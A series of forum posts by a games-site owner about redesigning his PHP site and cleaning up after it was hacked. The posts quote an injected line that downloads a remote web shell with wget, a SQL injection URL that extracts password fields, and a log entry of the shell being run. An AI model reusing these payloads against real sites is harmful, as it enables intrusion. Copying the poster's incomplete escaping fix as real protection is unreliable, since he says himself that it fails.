hedgehog90

Hi, I have a games site called GPStudios.com I paid to have it built in 2009, but as you can see, it's looking a bit ropey these days compared to most other sites. Since having it built , I have made many alterations to the site, and gradually learnt a lot of html and php along the way. I make games myself, I do all the coding and all the graphics, so I feel quite confident that I can design all the assets of my site with relative ease. I've been using Dreamweaver for years now and I can now quite easily design a page of my own using php, http, javascript and mySQl. My only weakness is getting to grips with css, but I'm working on it. I want to redesign the site from the bottom up, ditch the old design and create something completely new. I will obviously use certain elements of the old site (much like I re use functions/engines/frameworks in all my games), but the site design is SUCH a mess that I don't think it would be wise to tidy it up. It's too far gone IMO. So, this is my rather broad question... I would like to know where I should start. What methods should I use? My site is currently made up of mostly .php files. Is this appropriate nowadays? I have a attached a few files to show you generally how the site is written. Because every page is largely the same, it uses a lot of includes. Even on a page with unique content, it is often included as a separate php (eg homepage_popular). Unfortunately, this makes it difficult to preview the site in the dreamweaver design view. Also, all the functions for the site are contained within a single functions.class.php file, which I was once told was very bad practice. Is it? I'd like to know generally a method or a practice I should use. When every page more or less uses the same template, is repeating the same div tags and includes necessary? Is there a better way of repeating myself? For instance, if I wanted for some reason to not have a header on my site, this would require me to change every single page. My current site has been a victim to php injection also, so I'd like to know exactly how I can prevent this happening in the new site. I'm not interested in designing it for multiple screen sizes, because most Flash games aren't really made for mobile devices. I think a 950/1000 px width static container is all I need. I am genuinely focussed on redesigning my site, and if it means I have to spend several months of weekends working on it and learning about stuff then so be it. I don't want to pay anyone else to do it, I want it to be 100% my own creation. index.php functions.class.php homepage_popular.php

OK, I've got the message. I'll fuck off now shall I? Sorry for wasting your time.

Indeed, my hole is truly massive.

I did this... or so I thought. Just to say "CLEAN IT" is not the kind of help I am looking for. Obviously, I'd rather get this fixed myself, otherwise I wouldn't have come here, so forgive me if I ignore that. While I am very grateful for the help and attention, I've yet to have someone give me a step by step guide of EXACTLY how to rid myself of these problems. Since I last posted, it appears the hacker has returned AGAIN, this time to change my password to the CMS. I haven't noticed any modifications though apart from this.

FFS, it's back... but now on the forum. I found an editted php file in the file: /forum/caches/tpl_AeroBlue_search_results.html.php and also in: /forum/styles/AeroBlue/template/search_body.html Both contain this line of code at the top: system('wget http://koliasoft.narod2.ru/w.php'); And that downloads and stores a file called w.php in the forum folder. (There's also another file called w.php.1, a copy) All the files in the cache folder appear to be modified almost daily, this must be normal. However, I can see that search_body.html was editted 02.38 AM today. I'm hoping that my fixes worked on the rest of the website, and that's why the problem files have moved to the forum, which i assumed was secure. You would think the latest PHPBB would protect itself from mysql injection??? But apparently not. So, probably from that w.php file, the footer.php had been editted again with that annoying iframe. I need to wait 24 hours until the Apache Logs update on my end before I can start seeing exactly how it was done... As I said earlier, I updated my PHPBB forum to the latest version a few days ago. The username and passwords for the 2 administrators on the forum are different to the other login details for the main site. I guess the person behind this could have also gotten my username and password on the old unprotected pages and made a note of it. For now, I won't change my username/password, because before I change them I want to have fixed the problem of mysql injection on the site. Help?

Great, I think I've got it sorted! I went through all the files, searched for every instance of _GET, _POST and _REQUEST, and depending on their data type (int or string) I have applied mysql_real_escape_string to strings, and (int) to ints. I hope this will be enough to stop the same hacker from ever hacking again. The last 2 days have been hell. Cunt. How can I encrypt my username and password when used in strings? I think there is only 1 instance of this in my code.

Posted a new topic: http://www.phpfreaks.com/forums/index.php?topic=335030.0

Now, obviously, I can't post the actual code that retrieves my admin login details, but the format of the code used is like this: /webpage.php?id=79+and+1=-1+union+/*asd*/+select+1,2,3,password_details,5,6,7,8,9,10,11,12,13,14,15,16+from+databasename/**/.table+limit+0,1-- On the page that loads the string with a _GET I added this code at the top: foreach ($_GET as $key => $value) { $_GET[$key] = mysql_real_escape_string($value); } But, when I eventually _GET("id"), it is no different than if I hadn't processed it with mysql_real_escape_string. The page loads just fine and arrogantly displays my login details like a... well... like a massive c*nt. How can I universally stop injections occurring? If I use (int), it's fine, but there are many other queries else where on the site where I need to _GET a string, for which the above injection code will get through despite mysql_real_escape_string. Help, please. * u

Looking at the logs, the beginning looked automatic, trying a query a second, but it then looks like it was done manually. There were long pauses between his attempts. I've downloaded the scripts from the site and I want to edit them so that this never happens again. I've been trying mysql_escape_real_string with the url he used to get my username and password, and I still get returned my details. It appears to do fuck all with that particular example.

I've worked part of it out now... I've been going through the logs for HOURS, it's incredibly tedious and boring. I've found the prick who did this: 89.232.248.163. Russian. Crafty. On May 15th, he used mysql injection to get my CMS login details. Once he had the login details he played around in the CMS and changed replaced a game file with w.php. It turns out you can upload phps despite what I said... After that, he went to playgame page for that speciifc game, and ran it over and over. I've got to admit, this guy was very quick and clever to do this - the back end is a bit of a mess and very hard for someone else to understand (or so I thought) So, that explains w.php, but it doesn't necessarilly explain game.js and the footer.php and index.php files being editted on May 31st. There is certainly absolutely no functionailty in the CMS to alter php files, or files of any kind. All the files it uploads/deletes are in the admin folder. Index.php and footer.php at are in the root. If w.php when run editted these files, then why didn't it do it 16 days prior? I can't find anything out through the log about these alterations except the time and day that game.js was first run. What now? More importantly, what are the steps to take to maike sure this never happens again?

Ok, I've found something. I was going through the logs, and I found the first occurance of the game.js file being loaded. I looked back a few seconds before this and found a "POST" that said: 188.226.15.54 - - [31/May/2011:09:49:25 -0500] "POST /games/files/w/w.php HTTP/1.1" 200 12970 "http://www.gpstudios.com/games/files/w/w.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24" I looked inside the /games/files/w/ and sure enough, there it was. I've attached it to show it to you. I have no idea how this was uploaded. It means it was likely done on the back-end and not through ftp, but the script for uploading new games does not allow the upload of php files, and it's not recorded by mySQL :/ .... I've just been thinking, how could the person who uploaded that file run it? Anything within /games/ is inaccessable because I had locked directory indexing (going through folders like a contents page) in the htaccess file... but last night I noticed my my htaccess had disappearred! I didn't even relate it to the apparrent hacking I had spent all day trying to fix. I re-uploaded an old one and didn't think anymore about it. It must have been deleted by the person who uploaded it, and then the script was run.... I can't see how it could have been uploaded through the back-end... the only evidence for it is that the w.php file is within a folder called w, which is exactly the same format as the games files. Help, please. [attachment deleted by admin]

I updated it this morning because i read that it might have been the problem. It's up to date, I'm on 3.0.8.

What search term should i search for in mySQL? Download the site and reupload it? I'm sorry, but I really don't see the sense in that, also, due to the amount of data on the website, it would take my internet connection 10s of hours to do this. This would be a last resort, it would be such a massive job. Hostgator are helping me at the moment, hopefully they'll sort it out to some degree.

I changed the password and username for my CMS earlier today, but as I just said (in my editted post), the hacking was certainly not done through the CMS. It's not capable of uploading anything but swfs, text and pictures.

Oh, silly I haven't mentioned yet the url of my website: www.gpstudios.com If by CMS you mean a back-end, then yes, however it can't add to files like index.php or anything like that. It's a games website. The backend allows me to upload/delete games and little else. The hacker must have gotten in through FTP. I have changed the password to the server account. I use Windows 7.... is that secure enough? I'm quite confident that my computer doesn't have any viruses or trojans. Can someone please explain to me how someone can get my personal details/upload files to the server space without my permission? I understand that hacking exists, but I've never truly gotten my head round how websites are hacked into without a data leak?